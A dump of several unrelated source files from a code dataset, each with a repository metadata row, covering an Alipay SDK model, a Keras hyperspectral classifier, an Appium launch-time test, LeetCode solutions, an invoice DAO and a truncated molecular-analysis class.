    _FIELDS = ("tag_ext_info", "tag_name", "tag_value")

    def __init__(self):
        self._tag_ext_info = None
        self._tag_name = None
        self._tag_value = None

    @property
    def tag_ext_info(self):
        return self._tag_ext_info

    @tag_ext_info.setter
    def tag_ext_info(self, value):
        self._tag_ext_info = value

    @property
    def tag_name(self):
        return self._tag_name

    @tag_name.setter
    def tag_name(self, value):
        self._tag_name = value

    @property
    def tag_value(self):
        return self._tag_value

    @tag_value.setter
    def tag_value(self, value):
        self._tag_value = value

    def to_alipay_dict(self):
        """Serialize the truthy fields to a plain dict for the alipay API."""
        params = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if not value:
                continue  # unset / empty fields are omitted, as before
            if hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an instance from an alipay response dict; None for empty input."""
        if not d:
            return None
        o = KbdishCommRuleShowInfo()
        for name in KbdishCommRuleShowInfo._FIELDS:
            if name in d:
                setattr(o, name, d[name])
        return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/KbdishCommRuleShowInfo.py | KbdishCommRuleShowInfo.py | py | 1,884 | python | en | code | 241 | github-code | 13 |
29817695078 | import pickle
import numpy as np
import tensorflow as tf
from sklearn.svm import SVC
from random import shuffle
from sklearn.preprocessing import normalize
from sklearn.neighbors import KNeighborsClassifier
import utils
import image
import pickle
import os
from keras.models import Sequential
from keras.layers import Dense
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.preprocessing import LabelEncoder
from keras.utils import np_utils
import matplotlib.pyplot as plt
class classifier:
    # Trains an MLP on (avg-reflectance-vector, label) samples and classifies
    # new hyperspectral images.  Depends on keras, sklearn and the local
    # `image`/`utils` modules; the restyle is left untouched on purpose.
    def __init__(self, data, norm=True):
        # data: list of (input_vector, label) pairs; shuffled in place
        self.data = data
        shuffle(self.data)
        self.inputs = self._extract_input(norm)
        self.labels = self._extract_labels()
        self.valid_labels = self._get_valid_labels()
        self.encoder = LabelEncoder()
    def _extract_input(self, norm):
        """
        Extract the inputs and normalize
        them if normalize is set to true
        """
        inputs = [x[0] for x in self.data]
        if norm:
            # sklearn normalize() returns an ndarray; otherwise inputs stays a list
            inputs = normalize(inputs)
        return inputs
    def _extract_labels(self):
        """
        Extract the labels from the data
        """
        labels = [x[1] for x in self.data]
        return labels
    def _get_valid_labels(self):
        """
        Extract the set of valid class labels
        from the data
        """
        label_list = [x[1] for x in self.data]
        return set(label_list)
    def _ohe_labels(self):
        """
        One hot encode the labels
        """
        # NOTE: mutates self.labels from strings to a one-hot matrix
        self.encoder.fit(self.labels)
        self.labels = self.encoder.transform(self.labels)
        self.labels = np_utils.to_categorical(self.labels)
    def train_mlp(self, cv=False):
        """
        Train the mlp on the training data
        """
        self._ohe_labels()
        input_size = len(self.inputs[0])
        output_size = len(self.valid_labels)
        hidden_size_1 = 15
        hidden_size_2 = 15
        # Create the MLP
        model = Sequential()
        model.add(Dense(hidden_size_1, activation='relu', input_dim=input_size))
        model.add(Dense(hidden_size_2, activation='relu'))
        model.add(Dense(output_size, activation='softmax'))
        # Compile model with optimizer and loss function
        model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
        # Configure data
        # NOTE(review): fancy indexing features[train] below requires
        # features to be an ndarray -- only true when norm=True; confirm.
        features = self.inputs
        labels = self.labels
        kfold = KFold(n_splits=10, shuffle=True, random_state=5)
        scores = []
        if cv:
            # 10-fold cross-validation: a fresh model is built per fold
            for train, test in kfold.split(features, labels):
                # Create the MLP
                model = Sequential()
                model.add(Dense(hidden_size_1, activation='relu', input_dim=input_size))
                model.add(Dense(hidden_size_2, activation='relu'))
                model.add(Dense(output_size, activation='softmax'))
                # Compile model with optimizer and loss function
                model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
                model.fit(features[train], labels[train], epochs=25, batch_size=5, verbose=2)
                # evaluate the model
                score = model.evaluate(features[test], labels[test], verbose=2)
                print("{0}: {1}".format(model.metrics_names[1], score[1]))
                scores.append(score[1])
            return scores
        else:
            # no cross-validation: train on everything, return the model
            model.fit(features, labels, epochs=30, batch_size=5, verbose=2)
            return model
    def classify_new_image(self):
        """
        Train the network, then classify each
        square of a divided image
        """
        n=5
        file_path = 'Data/YukonGold_Tomato_Banana_1_Day3.bil'
        print ("Loading image...")
        raw_image = image.HyperCube(file_path)
        #raw_image.dark_correction()
        original_shape = raw_image.image.shape
        orig_x = original_shape[0]
        orig_y = original_shape[1]
        print ("Dividing image...")
        # average spectrum per n x n tile of the image
        divided_image_reflectances = utils.avg_spectra_divided_image(raw_image, n)
        input_size = len(self.inputs[0])
        output_size = len(self.valid_labels)
        hidden_size_1 = 15
        hidden_size_2 = 15
        print ("Training model...")
        model = self.train_mlp()
        print ("Classifying image...")
        classified_image = model.predict(divided_image_reflectances)
        # argmax over the softmax output -> integer class per tile
        number_labels = []
        for im in classified_image:
            number_labels.append(np.argmax(im))
        number_labels = np.array(number_labels).astype(int)
        labeled_image = self.encoder.inverse_transform(number_labels)
        # NOTE(review): orig_x/n is float division on Python 3 and would make
        # np.reshape raise; this code appears to target Python 2 (integer
        # division). Confirm, or change to orig_x//n.
        labeled_image = np.reshape(labeled_image, (orig_x/n, orig_y/n, 1))
        raw_image.fix_image()
        divided_image_reflectances = utils.avg_spectra_divided_image(raw_image, n)
        divided_image_reflectances = np.reshape(divided_image_reflectances, (orig_x/n, orig_y/n, 290))
        plt.plot(divided_image_reflectances[0][0])
        plt.show()
        return (labeled_image, divided_image_reflectances)
if __name__ == '__main__':
    # load the precomputed (reflectance, label) training samples
    try:
        data = pickle.load( open( "avg_class_refl.p", "rb" ))
    except (OSError, IOError) as e:
        # NOTE(review): this bare string is a no-op (probably meant to be a
        # print), and 'data' stays undefined if the load fails, so the next
        # line would raise NameError.
        "No file found..."
    classify = classifier(data, norm=True)
    #errors = classify.train_mlp(cv=False)
    #for error in errors:
    #    print (error)
    # classify a new image and persist the per-tile labels
    image_classes = classify.classify_new_image()
    pickle.dump(image_classes[0], open("image_labels.p", "wb" ) )
pickle.dump(image_classes[1], open("image_refl.p","wb")) | senecal-jjs/Hyperspectral | keras_classification.py | keras_classification.py | py | 5,618 | python | en | code | 0 | github-code | 13 |
73817139217 | teencode = {
'vk': 'vo',
'ck': 'chong',
'hoy': 'thoi',
'lem': 'lam',
'hsi': 'hay sao i',
'yep': 'yes',
'choai xu': 'twice'
}
# interactive lookup loop for the teencode dictionary
# NOTE(review): 'loop' is never set to False, so this only ends when the
# user interrupts the program (Ctrl+C / EOF).
loop = True
while loop:
    # ask for a word ("What word do you want to look up?")
    key = input('Bạn muốn tra từ gì? ').strip()
    if key in teencode:
        # found: print "<word> means <meaning>"
        print(f"{key} nghĩa là {teencode[key]}")
    else:
        # not found: offer to add it ("Not in the dictionary. Add it? (yes/no)")
        answer = input('Chưa có trong từ điển. Bạn có muốn thêm mới vào? (yes/no): ').lower().strip()
        if answer == 'yes':
            # ask for the meaning ("Please enter the meaning of that word")
            meaning = input('Mời bạn nhập nghĩa của từ đó: ')
            teencode[key] = meaning
        else:
pass | thuhuongvan98/Huong-Van | Lesson 5/ex_dict.py | ex_dict.py | py | 625 | python | vi | code | 0 | github-code | 13 |
39653392352 | import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
def imitate_synchronize():
    '''
    Simulate synchronous queue usage: data has to be processed first,
    only then can it be dequeued for training.
    :return: None
    '''
    # 1 create a queue
    queue = tf.FIFOQueue(1000, tf.float32)
    # enqueue the initial data
    enq_m = queue.enqueue_many([[0.1, 0.3, 0.4],]) # note the shape: [0.1, 0.3, 0.4] on its own would be treated as a single tensor, not several elements
    # 2 the read-and-process pipeline: dequeue --> +1 --> enqueue
    enq_one = queue.dequeue() # read one element
    enq_add = enq_one + 1 # operate on it
    deq_one = queue.enqueue(enq_add) # put it back
    with tf.Session() as sess:
        # initialize the queue with the starting data
        sess.run(enq_m)
        # process the data
        for i in range(100):
            sess.run(deq_one) # chained computation: running the last op triggers the whole dequeue->add->enqueue chain
        for j in range(queue.size().eval()): # queue.size() is an op, so eval() is needed to turn it into a value
            print(sess.run(queue.dequeue()))
    return None
def imitate_asynchronize():
    '''
    Simulate asynchronous data reading:
    child threads enqueue samples while the main thread dequeues them.
    :return: None
    '''
    # 1 build a queue holding up to 1000 elements
    queue = tf.FIFOQueue(1000, tf.float32)
    # 2 define the ops: +1 then enqueue the value
    var = tf.Variable(0.0)
    data = tf.assign_add(var, tf.constant(1.0))
    deq_one = queue.enqueue(data)
    # child threads / queue runner --- define the QueueRunner op, specifying
    # how many child threads to use and what each of them should do
    qr = tf.train.QueueRunner(queue, enqueue_ops=[deq_one] * 2)
    # variable initializer
    init_op = tf.global_variables_initializer()
    with tf.Session() as sess:
        # initialize the variables
        sess.run(init_op)
        # start the thread coordinator ---- used to reclaim the threads later
        coord = tf.train.Coordinator()
        # define the child-thread work and start the child threads
        threads = qr.create_threads(sess,coord=coord, start=True)
        # the main thread reads the data / trains
        for i in range(300):
            print(sess.run(queue.dequeue()))
        # reclaim the child threads
        coord.request_stop()
        coord.join(threads)
        pass
    return None
# entry point: runs the asynchronous producer/consumer demo (the call
# below is the synchronous variant, kept disabled for reference)
if __name__ == '__main__':
    # imitate_synchronize()
imitate_asynchronize() | bwbobbr/AI | 机器学习/day_05/day_05.py | day_05.py | py | 2,448 | python | zh | code | 0 | github-code | 13 |
41643411405 | # Method: 2 pass method
# 1: Calculate Length
# 2: Split list into k lists
# TC: O(n)
# SC: O(n)
from typing import Optional
class ListNode:
    """Singly linked list node."""

    def __init__(self, val=0, next=None):
        # value stored in this node, and the link to the following node (or None)
        self.val, self.next = val, next
class Solution:
    """LeetCode 725 - split a linked list into k consecutive parts.

    Two-pass approach: measure the length, then cut the list into k parts
    whose sizes differ by at most one (earlier parts get the extra nodes).
    Time O(n), extra space O(k) for the result list.
    """

    def splitListToParts(self, head: 'Optional[ListNode]', k: int) -> 'List[Optional[ListNode]]':
        # NOTE: annotations are quoted — the file never imported typing.List,
        # so evaluating the annotation at def time raised NameError.
        # 1: count the nodes
        length = 0
        node = head
        while node:
            length += 1
            node = node.next
        part_len, extra = divmod(length, k)

        # 2: cut off k parts; the first `extra` parts get one extra node
        result = []
        node = head
        for i in range(k):
            result.append(node)  # may be None for trailing empty parts
            size = part_len + (1 if i < extra else 0)
            prev = None
            for _ in range(size):
                prev = node
                node = node.next
            if prev:
                # BUGFIX: sever the list only after the LAST node of the
                # part; the original set temp.next = None on EVERY node,
                # truncating each part to a single element.
                prev.next = None
        return result
| ibatulanandjp/Leetcode | #725_SplitLinkedListInParts/solution.py | solution.py | py | 1,243 | python | en | code | 1 | github-code | 13 |
32642770740 |
import numpy as np
import tensorflow as tf
from agent import agent
from rtb_environment import RTB_environment, get_data
from drlb_test import drlb_test
from lin_bid_test import lin_bidding_test
from rand_bid_test import rand_bidding_test
#parameter_list = [camp_id, epsilon_decay_rate, budget_scaling, budget_init_variance, initial_Lambda]
def parameter_camp_test(parameter_list):
    """
    Train a DRLB bidding agent across all training campaigns and evaluate
    it on the campaign named by parameter_list[0].

    parameter_list layout:
        [0] camp_id, [1] budget_scaling, [2] initial_Lambda,
        [3] epsilon_decay_rate, [4] budget_init_variance (pre-scaling),
        [5] step_length, [6] learning_rate, [7] random seed

    Returns a dict with the agent's test-campaign results plus linear- and
    random-bidding baselines for comparison.
    """
    # fixed hyper-parameters
    epsilon_max = 0.9
    epsilon_min = 0.05
    discount_factor = 1
    batch_size = 32
    memory_cap = 100000
    update_frequency = 100
    episode_length = 96
    # parameters under test
    camp_id = parameter_list[0]
    budget_scaling = parameter_list[1]
    initial_Lambda = parameter_list[2]
    epsilon_decay_rate = parameter_list[3]
    budget_init_var = parameter_list[4] * budget_scaling
    step_length = parameter_list[5]
    learning_rate = parameter_list[6]
    seed = parameter_list[7]
    action_size = 7
    state_size = 5
    # fresh graph + deterministic seeding per run
    tf.reset_default_graph()
    np.random.seed(seed)
    tf.set_random_seed(seed)
    sess = tf.Session()
    rtb_agent = agent(epsilon_max, epsilon_min, epsilon_decay_rate,
                      discount_factor, batch_size, memory_cap,
                      state_size, action_size, learning_rate, sess)
    camp_n = ['1458', '2259', '2997', '2821', '3358', '2261', '3386', '3427', '3476']
    train_file_dict, test_file_dict = get_data(camp_n)
    test_file_dict = test_file_dict[camp_id]
    total_budget = 0
    total_impressions = 0
    global_step_counter = 0
    # training: iterate every campaign, consuming its data in episodes
    for i in camp_n:
        rtb_environment = RTB_environment(train_file_dict[i], episode_length, step_length)
        total_budget += train_file_dict[i]['budget']
        total_impressions += train_file_dict[i]['imp']
        while rtb_environment.data_count > 0:
            # per-episode budget scaled to the remaining data, with noise
            episode_size = min(episode_length * step_length, rtb_environment.data_count)
            budget = train_file_dict[i]['budget'] * min(rtb_environment.data_count, episode_size) \
                     / train_file_dict[i]['imp'] * budget_scaling
            budget = np.random.normal(budget, budget_init_var)
            state, reward, termination = rtb_environment.reset(budget, initial_Lambda)
            while not termination:
                # standard DQN loop: act, store transition, learn
                action, _, _ = rtb_agent.action(state)
                next_state, reward, termination = rtb_environment.step(action)
                memory_sample = (action, state, reward, next_state, termination)
                rtb_agent.replay_memory.store_sample(memory_sample)
                rtb_agent.q_learning()
                if global_step_counter % update_frequency == 0:
                    rtb_agent.target_network_update()
                rtb_agent.e_greedy_policy.epsilon_update(global_step_counter)
                state = next_state
                global_step_counter += 1
    epsilon = rtb_agent.e_greedy_policy.epsilon
    # test budget: average budget per impression across training, scaled
    budget = total_budget / total_impressions * test_file_dict['imp'] * budget_scaling
    imp, click, cost, wr, ecpc, ecpi, camp_info = drlb_test(test_file_dict, budget, initial_Lambda, rtb_agent,
                                                            episode_length, step_length)
    sess.close()
    # baselines on the same test campaign and budget
    lin_bid_result = list(lin_bidding_test(train_file_dict[camp_id], test_file_dict, budget, 'historical'))
    rand_bid_result = list(rand_bidding_test(train_file_dict[camp_id], test_file_dict, budget, 'uniform'))
    result_dict = {'camp_id':camp_id, 'parameters': parameter_list[1:], 'epsilon':epsilon, 'total budget':budget,
                   'auctions': test_file_dict['imp'],
                   'camp_result': np.array([imp, click, cost, wr, ecpc, ecpi]).tolist(), 'budget':camp_info[0],
                   'lambda':camp_info[1], 'unimod':camp_info[2], 'action values':camp_info[3],
                   'lin_bid_result':lin_bid_result, 'rand_bid_result':rand_bid_result}
return result_dict | zgcgreat/dqn-rtb | parameter_test.py | parameter_test.py | py | 4,072 | python | en | code | 0 | github-code | 13 |
36388907882 | """
Implement the Reverification XBlock "reverification" server
"""
import logging
from opaque_keys.edx.keys import CourseKey
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from verify_student.models import VerificationCheckpoint, VerificationStatus, SkippedReverification
from django.db import IntegrityError
log = logging.getLogger(__name__)
class ReverificationService(object):
    """Service backing the Reverification XBlock's "reverification" runtime
    service: query, start and skip in-course identity re-verification.
    """
    def get_status(self, user_id, course_id, related_assessment):
        """ Check if the user has any verification attempt or has skipped the verification
        Args:
            user_id(str): User Id string
            course_id(str): A string of course_id
            related_assessment(str): Verification checkpoint name
        Returns:
            "skipped" if the user has skipped re-verification, the latest
            verification status string if any attempt was submitted, else None
        """
        course_key = CourseKey.from_string(course_id)
        has_skipped = SkippedReverification.check_user_skipped_reverification_exists(user_id, course_key)
        if has_skipped:
            return "skipped"
        try:
            # .latest() relies on the model's Meta.get_latest_by ordering
            checkpoint_status = VerificationStatus.objects.filter(
                user_id=user_id,
                checkpoint__course_id=course_key,
                checkpoint__checkpoint_name=related_assessment
            ).latest()
            return checkpoint_status.status
        except ObjectDoesNotExist:
            return None
    def start_verification(self, course_id, related_assessment, item_id):
        """ Get or create the verification checkpoint and return the re-verification link
        Args:
            course_id(str): A string of course_id
            related_assessment(str): Verification checkpoint name
            item_id(str): Usage id of the block that triggered re-verification
        Returns:
            Re-verification link
        """
        course_key = CourseKey.from_string(course_id)
        VerificationCheckpoint.objects.get_or_create(course_id=course_key, checkpoint_name=related_assessment)
        re_verification_link = reverse(
            'verify_student_incourse_reverify',
            args=(
                unicode(course_key),
                unicode(related_assessment),
                unicode(item_id)
            )
        )
        return re_verification_link
    def skip_verification(self, checkpoint_name, user_id, course_id):
        """Record that the user skipped re-verification for this course.
        Args:
            checkpoint_name(str): Verification checkpoint name
            user_id(str): User Id string
            course_id(str): A string of course_id
        Returns:
            None
        """
        course_key = CourseKey.from_string(course_id)
        checkpoint = VerificationCheckpoint.objects.get(course_id=course_key, checkpoint_name=checkpoint_name)
        # a user may only skip once per course; a second attempt violates the
        # unique constraint and is logged instead of propagating
        try:
            SkippedReverification.add_skipped_reverification_attempt(checkpoint, user_id, course_key)
        except IntegrityError:
            log.exception("Skipped attempt already exists for user %s: with course %s:", user_id, unicode(course_id))
| escolaglobal/edx-platform | lms/djangoapps/verify_student/services.py | services.py | py | 3,251 | python | en | code | 0 | github-code | 13 |
16510515254 | """
from : https://leetcode.com/problems/candy-crush/discuss/1028524/Python-Straightforward-and-Clean-with-Explanation
Don't be intimidated by how long or ugly the code looks. Sometimes I fall into that trap. It's simpler than it seems.
Also, I would love feedback if this is helpful, or if there are any mistakes!
A key insight to the problem is to know that in order to make crushing the candies an easier process, you should store the locations of the board where a candy can be crushed in a separate data structure.
We will use a set called "crushable" and store coordinates of the board where a candy may be crushed
5 Main Steps.
Mark where the candies can be crushed horizontally
Loop through the board and check 3 spots at a time to see if there is the same character and that character isn't 0
Mark where the candies can be crushed vertically
Same thing, but vertically
Crush the candies
Go through the set of crushable locations, and edit the original board
Shift candies down if there are zeroes below them.
Pay attention to the columns. We will start from the bottom of the board, and work our way up, shifting the candies that were not crushed into their "fallen" position.
Find out where to determine whether or not a board's candies can be crushed anymore
If we loop through the entire board, and no candy was crushed, then we are finished.
Time: O(m * n) where m = rows and n = cols. Or you could say O(n) where n = every element in the board
- We must loop through the entire board no matter what
Space: O(n) where n is the total number of elements in the board
- In the worst case scenario, we store the locations of every spot on the board in the crushable set
"""
class Solution:
    """LeetCode 723 - Candy Crush.

    Repeatedly mark every horizontal/vertical run of 3+ equal non-zero
    candies, crush them to 0, and let the remaining candies fall, until the
    board is stable.  The board is modified in place and also returned.
    """

    def candyCrush(self, board: 'List[List[int]]') -> 'List[List[int]]':
        # NOTE: annotations are quoted — the file never imported typing.List,
        # so evaluating the annotation at def time raised NameError.
        m, n = len(board), len(board[0])
        while True:
            crushable = set()  # coordinates of candies to crush this round
            # 1. mark horizontal runs of 3 equal, non-empty candies
            for x in range(m):
                for y in range(n - 2):
                    if board[x][y] == board[x][y+1] == board[x][y+2] != 0:
                        crushable.update([(x, y), (x, y+1), (x, y+2)])
            # 2. mark vertical runs
            for x in range(m - 2):
                for y in range(n):
                    if board[x][y] == board[x+1][y] == board[x+2][y] != 0:
                        crushable.update([(x, y), (x+1, y), (x+2, y)])
            # 3. nothing marked -> board is stable, done
            # (replaces the redundant 'stable' flag of the original)
            if not crushable:
                return board
            # 4. crush the marked candies
            for x, y in crushable:
                board[x][y] = 0
            # 5. gravity: walk each column bottom-up, shifting survivors down
            for y in range(n):
                offset = 0
                for x in range(m - 1, -1, -1):
                    if (x, y) in crushable:
                        offset += 1                    # one more empty slot below
                    else:
                        board[x + offset][y] = board[x][y]
                for x in range(offset):                # fill the vacated top cells
                    board[x][y] = 0
| tmbothe/Data-Structures-and-algorithms | src/arrays/candyCrush.py | candyCrush.py | py | 3,377 | python | en | code | 0 | github-code | 13 |
41905906790 | import csv
import os
import time
import re
import commands
import string
from appium import webdriver
import logging
import datetime
logging.basicConfig(level=logging.INFO)
apk_path = os.path.join(os.getcwd(), 'lite.apk')
class Browser(object):
    """Appium wrapper around the Qihoo browser app for launch-time testing.
    NOTE(review): Python 2 only -- relies on the removed `commands` module
    and `string.strip`.
    """
    # device properties queried over adb once, at class definition time
    platform_name = 'Android'
    platform_version = string.strip(commands.getoutput('adb shell getprop ro.build.version.release'))
    devices_name = string.strip(commands.getoutput('adb shell getprop ro.serialno'))
    phone_name = string.strip(commands.getoutput('adb shell getprop ro.build.id'))
    def __init__(self):
        # NOTE(review): platformVersion/deviceName are hard-coded and do NOT
        # use the adb-derived class attributes above -- confirm intended.
        self.desired_caps = {}
        self.desired_caps['platformName'] = 'Android'
        self.desired_caps['platformVersion'] = '6.0'
        self.desired_caps['deviceName'] = '80QBCP9224W2'
        self.desired_caps['app'] = apk_path
        self.desired_caps['appPackage'] = 'com.qihoo.contents'
        self.desired_caps['appActivity'] = 'com.qihoo.contents.launcher.LauncherActivity'
        self.desired_caps['noReset'] = True
        self.desired_caps['unicodeKeyboard'] = False
        self.desired_caps['resetKeyboard'] = False
        # connect to a locally running appium server
        self.driver = webdriver.Remote('http://localhost:4723/wd/hub', self.desired_caps)
        self.driver.implicitly_wait(600)
    def install_app(self):
        # fire-and-forget adb install; output is not checked
        cmd = 'adb install ' + apk_path
        os.popen(cmd)
        logging.info('install app done')
    def uninstall_app(self):
        cmd = 'adb uninstall com.qihoo.contents'
        os.popen(cmd)
        logging.info('uninstall app done')
    def is_app_installed(self):
        # scan the installed-package list for the app under test
        cmd = 'adb shell pm list packages'
        output = os.popen(cmd)
        app_status = False
        for line in output.readlines():
            if 'com.qihoo.contents' in line:
                app_status = True
        return app_status
    def test_launch_time(self):
        # measure the time until the home screen element becomes visible;
        # NOTE(review): implicitly returns None if is_displayed() is False
        start_time = self.get_cur_time()
        # logging.info('StartTime is ' + string(start_time))
        ele = self.driver.find_element_by_id('com.qihoo.contents:id/home_top_user')
        if ele.is_displayed():
            end_time = self.get_cur_time()
            # logging.info("Endtime is " + string(end_time))
            launch_time = end_time - start_time
            return launch_time
    def get_cur_time(self):
        # round-trips now() through a string; effectively datetime.now()
        return datetime.datetime.strptime(str(datetime.datetime.now()), '%Y-%m-%d %H:%M:%S.%f')
class Controller(object):
    """Drives repeated launch-time measurements and saves them to a CSV file."""

    def __init__(self, count):
        # count: number of launch-time samples to collect
        self.browser = Browser()
        self.count = count
        # header row for the CSV output; a list keeps the column order
        # stable (the original used a set literal, which has no order)
        self.data = [['#', 'launch_time']]

    def run(self):
        """Measure the launch time *count* times, recording every sample."""
        run_no = 1
        while self.count > 0:
            launch_time = self.browser.test_launch_time()
            # BUGFIX: the measurement was discarded and time.time(3) raised
            # TypeError; record the sample and sleep between runs instead.
            self.data.append([run_no, launch_time])
            time.sleep(3)
            run_no += 1
            self.count = self.count - 1

    def save_data(self):
        """Write all collected samples to a per-device, timestamped CSV file."""
        # NOTE(review): cur_time() is not defined in this file -- verify it
        # exists elsewhere, otherwise this raises NameError.
        csv_path = self.browser.phone_name + '_launchTime_' + cur_time() + '.csv'
        # open() instead of the Python-2-only file() builtin; 'wb' kept for
        # the Python 2 csv module this script targets
        csv_file = open(csv_path, 'wb')
        w = csv.writer(csv_file)
        w.writerows(self.data)
        csv_file.close()

    def tearDown(self):
        """Uninstall the app under test and shut down the appium session."""
        os.popen('adb uninstall com.qihoo.contents')
        self.browser.driver.quit()
if __name__ == "__main__":
    logging.info(apk_path)
    # collect 10 launch-time samples and persist them
    controller = Controller(10)
    controller.run()
    # NOTE(review): controller.tearDown() is never called, so the appium
    # session and the installed app are left behind after the run.
    controller.save_data()
| sxwollo/BrowserAppTest | venv/AppTest/launch_time_ui.py | launch_time_ui.py | py | 3,127 | python | en | code | 0 | github-code | 13 |
# Shuffle a 52-card deck (cards numbered 1..52) by repeated random swaps.
poker = list(range(1, 53))
import random as rd
# rd.seed(30)  # uncomment for a reproducible shuffle
n = 0
count = 1000
while n <= count:
    # randrange(52) covers every index 0..51; the original used
    # int(rd.random()*51), which yields only 0..50 and could therefore
    # never move the last card out of position 51.
    rdnum1, rdnum2 = rd.randrange(52), rd.randrange(52)
    while rdnum2 == rdnum1:
        rdnum2 = rd.randrange(52)
    poker[rdnum1], poker[rdnum2] = poker[rdnum2], poker[rdnum1]
    n += 1
# Deal the top two cards of the shuffled deck.
first, second = poker[0], poker[1]
def drop_card(card):
    """Print the suit and rank of ``card`` (an int in 1..52).

    Cards 1-13 are spades (黑桃), 14-26 hearts (愛心), 27-39 diamonds
    (菱形), 40-52 clubs (梅花).  The original used ``card//13`` and
    ``card%13``, so every 13th card (13, 26, 39, 52) fell into the
    wrong suit with rank 1; ``divmod(card - 1, 13)`` fixes that
    off-by-one.
    """
    kind, num = divmod(card - 1, 13)
    if kind == 0: print("黑桃", end=" ")
    if kind == 1: print("愛心", end=" ")
    if kind == 2: print("菱形", end=" ")
    if kind == 3: print("梅花", end=" ")
    print(num + 1)
drop_card(first),drop_card(second)
# Count how many elements of ``a`` also occur in ``b``.
a = [1, 2, 3, 4, 5, 6, 7, 8]
b = [1, 2, 3, 4, 5, 6, 7, 8]
# Set membership is O(1), replacing the original O(len(a)*len(b)) nested
# loops.  Like the original (which broke after the first match), each
# occurrence in ``a`` counts once if the value appears anywhere in ``b``.
b_set = set(b)
length = sum(1 for i in a if i in b_set)
print(length)
| fightpf/advanceiborgainc | 20200529temp.py | 20200529temp.py | py | 763 | python | en | code | 0 | github-code | 13 |
10065084450 | try:
from models.db import DbDAO
except ModuleNotFoundError:
from website.models.db import DbDAO
import logging
__author__ = "Le Gall Guillaume"
__copyright__ = "Copyright (C) 2020 Le Gall Guillaume"
__website__ = "www.gyca.fr"
__license__ = "BSD-2"
__version__ = "1.0"
class Invoice:
    """In-memory representation of a single invoice record."""

    def __init__(self):
        # Field defaults, listed in the column order used by the DAO;
        # insertion order also fixes the __dict__/__str__ layout.
        for attr, default in (
            ('name', ''),
            ('id_client', 0),
            ('project', ''),
            ('date_sent', ''),
            ('date_expiry', ''),
            ('max_delay', ''),
            ('total', ''),
            ('tax', False),
            ('days', 0),
            ('day_rate', 0),
            ('sold', False),
            ('created', ''),
            ('id_profile', -1),
        ):
            setattr(self, attr, default)

    def __str__(self):
        return str(self.__dict__)

    def __repr__(self):
        return f"<Invoice name: '{self.name}'>"
class InvoiceDAO(DbDAO):
    """Data-access object for `Invoice` rows, stored in table 'invoice'.

    Invoice arguments to exist()/delete() are matched by id when the
    object has one, otherwise by name; any other argument type is
    treated as a prebuilt WHERE clause and forwarded to DbDAO as-is.
    """
    def __init__(self, dbpath=None):
        super().__init__('invoice',db_path=dbpath)
        self.obj_type = Invoice  # row factory used by DbDAO
        # Column -> SQL type map DbDAO uses to CREATE the table.
        self.table_create = {
            'id': 'INTEGER PRIMARY KEY AUTOINCREMENT',
            'name': 'text NOT NULL',
            'id_client': 'INTEGER NOT NULL',
            'project': 'TEXT',
            'date_sent': 'TEXT',
            'date_expiry': 'TEXT',
            'max_delay': 'TEXT',
            'tax': 'BOOLEAN',
            'days': 'INTEGER',
            'day_rate': 'FLOAT',
            'total': 'TEXT',
            'sold': 'BOOLEAN',
            'created': 'TEXT',
            'id_profile': 'INTEGER NOT NULL'
        }
    def exist(self, obj):
        """Return whether *obj* exists (Invoice matched by id/name, or
        a ready-made WHERE clause)."""
        if isinstance(obj, Invoice):
            if hasattr(obj, 'id'):
                logging.info('InvoiceDAO use exist with id')
                return super().exist(self.where('id', obj.id))
            else:
                logging.info('InvoiceDAO use exist with name')
                return super().exist(self.where('name', obj.name))
        else:
            logging.info('InvoiceDAO use exist with WHERE')
            return super().exist(obj)
    def insert(self, obj):
        """Insert *obj*, temporarily stripping the transient
        ``total_tax`` attribute (it is not a database column)."""
        cpy = None
        if hasattr(obj, 'total_tax'):
            cpy = obj.total_tax
            del obj.total_tax
        ret = super().insert(obj)
        # NOTE(review): a falsy saved value (0, '') is not restored
        # because of this truthiness check -- confirm intended.
        if cpy:
            obj.total_tax = cpy
        return ret
    def update(self, obj):
        """Update the row matched by *obj*'s name; ``total_tax`` is
        stripped and restored exactly as in insert()."""
        cpy = None
        if hasattr(obj, 'total_tax'):
            cpy = obj.total_tax
            del obj.total_tax
        ret = super().update(obj, self.where('name', obj.name))
        if cpy:
            obj.total_tax = cpy
        return ret
    def delete(self, obj):
        """Delete by id, by name, or by a prebuilt WHERE clause."""
        if isinstance(obj, Invoice):
            if hasattr(obj, 'id'):
                logging.info('InvoiceDAO use delete with id')
                return super().delete(self.where('id', obj.id))
            else:
                logging.info('InvoiceDAO use delete with name')
                return super().delete(self.where('name', obj.name))
        else:
            logging.info('InvoiceDAO use delete with WHERE')
            return super().delete(obj)
25620512291 | """
To analysing the behavior of ODA at the interface
"""
import typing
import numpy as np
import matplotlib.pylab as plt
import logger
from get_data import GetData
import static_info as stinfo
class WrapData(GetData):
    """
    Load the trajectory data (via GetData) and precompute the quantities
    every downstream analysis needs: the time-averaged nanoparticle
    centre of mass and the per-frame displacement from that average.
    """
    mean_nanop_com: np.ndarray  # Average of the nanoparticle COM over times
    # Shift of COM at each time from average
    nanoparticle_disp_from_avg_com: np.ndarray
    interface_locz: float  # Z location of the interface
    nanop_radius: float  # Radius of the nanoparticle
    def __init__(self) -> None:
        super().__init__()
        self.set_constants()
        self._initiate_calc()
    def set_constants(self) -> None:
        """
        Set fixed geometry constants.  The interface location could also
        be calculated dynamically from the water residues.
        """
        # Hard-coded interface z position -- presumably Angstrom, to
        # match the trajectory units; TODO confirm.
        self.interface_locz = 113.9
        self.nanop_radius = stinfo.np_info['radius']
    def _initiate_calc(self) -> None:
        """
        Run the calculations and analyses that all other classes need.
        """
        self.mean_nanop_com = self.find_mean_of_np_com()
        self.nanoparticle_disp_from_avg_com = self.find_np_shift_from_mean()
    def find_mean_of_np_com(self) -> np.ndarray:
        """Mean of the nanoparticle centre of mass over all frames."""
        return np.mean(self.split_arr_dict['APT_COR'], axis=0)
    def find_np_shift_from_mean(self,
                                ) -> np.ndarray:
